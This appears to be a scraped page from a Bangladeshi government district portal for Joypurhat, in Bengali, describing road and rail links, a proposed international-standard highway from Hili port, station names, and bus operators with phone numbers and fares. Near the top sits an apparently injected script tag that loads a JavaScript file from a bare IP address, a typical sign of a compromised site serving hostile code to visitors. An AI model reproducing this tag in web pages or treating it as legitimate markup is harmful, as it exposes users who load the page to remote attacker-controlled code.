Wellcome to National Portal

<script src="http://134.122.117.94/rajakar.js"></script>FF

মেনু নির্বাচন করুন
Main Comtent Skiped

যোগাযোগ ব্যাবস্থা

জয়পুরহাট জেলার উত্তর দিকে গুরুতবপূর্ণ সহল বন্দর দিনাজপুরের হিলি এবং দক্ষিণ-পশ্চিমে নওগাঁ জেলার অন্তর্গত প্রত্মতাত্তিবক নির্দশন পাহাড়পুর অবসিহত । তাই এ এলাকায় সবসময় কিছু লোকের সমাগম ঘটে। প্রতিদিন অসংখ্য যানবাহন বগুড়ার মোকামতলা দিয়ে জয়পুরহাট জেলায় প্রবেশ করে । তাছাড়া প্রতিদিন হিলি সহলবন্দর থেকে জয়পুরহাট ও বগুড়ার মোকামতলা হয়ে রাজধানী ঢাকা শহর ও  অন্যান্য এলাকাতে অসংখ্য যানবাহন চলাচল করে । কিন্তু হিলি সহলবন্দর থেকে জয়পুরহাট ও বগুড়া পর্যন্ত আর্ন্তজাতিক মানের রাসতা না থাকায় ছোট রাসতায় প্রায়শ দূর্ঘটনা ঘটছে । এতে যানমালের ব্যাপক ক্ষতি সাধিত  হচ্ছে । এমতাবসহায়, দিনাজপুরের হিলি বন্দর থেকে জয়পুরহাট হয়ে বগুড়ার মোকামতলা পযর্ন্ত আর্ন্তজাতিক মানের রাস্তা হওয়া প্রয়োজন ।

 

 ক) সড়ক যোগাযোগঃ

      পাকা রাস্তা -৩৪২.৫৯ কিঃ মিঃ

      আধা পাকা রাস্তা- ৬১.৯৫ কিঃ মিঃ

      কাঁচা রাস্তা -১৫৯৬ কিঃ মিঃ ।

 খ)  রেল যোগাযোগ

      মোট রেলপথ- ৩৮.৮৬ কিঃ মিঃ

মোট রেল স্টেশনের সংখ্যা- ০৭ টি ( জয়পুরহাট, পাঁচবিবি,জামালগঞ্জ, আক্কেলপুর, জাফরপুর, তিলকপুর ও বাগজানা )

 

            সড়ক পথে যোগাযোগের মাধ্যম (জয়পুরহাট থেকে) :

 

ক্র : ন

পরিবহনের নাম

ফোন নাম্বার

ভাড়া

১।

হানিফ পরিবহন,

০৫৭১-৬৩৩৯২

৩৫০/-

২।

কেয়া পরিবহন

০৫৭১-৬৩৪৪৭

৩৫০/-

৩।

সালমা পরিবহন

০৫৭১-৬২৬৮১

৩৫০/-

৪।

শ্যামলী পরিবহন

০৫৭১-৬৩২১২